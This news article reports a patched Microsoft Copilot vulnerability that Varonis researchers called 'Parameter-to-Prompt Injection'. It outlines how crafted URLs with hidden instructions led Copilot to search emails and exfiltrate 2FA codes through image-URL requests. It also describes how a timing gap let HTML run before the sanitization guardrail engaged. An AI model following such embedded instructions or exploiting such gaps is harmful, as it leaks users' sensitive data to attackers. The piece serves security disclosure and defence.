Researchers Expose Critical Microsoft Copilot Vulnerability Bypassing Security to Steal 2FA Codes
Key Takeaways
- ▸Microsoft Copilot had a critical vulnerability allowing attackers to exfiltrate 2FA codes and sensitive data from user emails via parameter injection attacks
- ▸The vulnerability exploited a fundamental architectural weakness: LLMs cannot distinguish between user instructions and malicious commands embedded in external content
- ▸Attackers bypassed multiple security layers by exploiting a timing gap in Copilot's HTML sanitization, triggering requests before guardrails could engage
Summary
Last Tuesday, Microsoft patched a critical vulnerability in its M365 Copilot AI platform that security researchers discovered could be exploited to steal sensitive data, including two-factor authentication (2FA) codes, from user emails. The vulnerability stemmed from Copilot's inability to distinguish between legitimate user instructions and malicious commands injected into third-party content—a fundamental weakness shared across modern large language models. Researchers from Varonis developed an exploit chain called "Parameter-to-Prompt Injection" that leveraged Copilot's search functionality to exfiltrate data through a sequence of attacks that required no user action beyond clicking a link.
The exploit worked by crafting URLs with hidden instructions that, when clicked, prompted Copilot to search emails, extract sensitive information, and embed it in image URLs triggering requests to attacker-controlled servers. Critically, the researchers discovered that Copilot's primary HTML sanitization guardrail—which wraps output in code blocks to prevent rendering—only activated after the response had already been streamed and partially rendered in the browser DOM. This timing gap allowed injected HTML to execute before protection could engage, rendering the safeguard useless.
The discovery illustrates a broader architectural problem with LLMs: their inherent compliance with any instruction presented to them, regardless of whether it comes from a trusted user or embedded in untrusted content. With no fundamental solution to what researchers call AI's "incurable gullibility," Microsoft and other LLM providers are forced to rely on ad hoc guardrails that determined attackers can circumvent. The vulnerability underscores that AI safety—particularly in enterprise settings where these models access sensitive user data—remains an unsolved problem.
- This disclosure reveals that current guardrail approaches are insufficient; securing LLMs against instruction injection attacks requires architectural redesign, not just patching
Editorial Opinion
This research demonstrates a critical and likely persistent failure in LLM architecture. The fact that sophisticated AI systems can be tricked into exfiltrating sensitive data through elegantly simple exploits—while security measures sit powerless microseconds away—suggests that current guardrail approaches are fundamentally inadequate. Microsoft's patch addresses this specific attack, but the underlying vulnerability remains: enterprises deploying Copilot and similar tools should assume that data exfiltration will continue as a persistent risk until these systems are either fundamentally redesigned or strictly isolated from sensitive information.



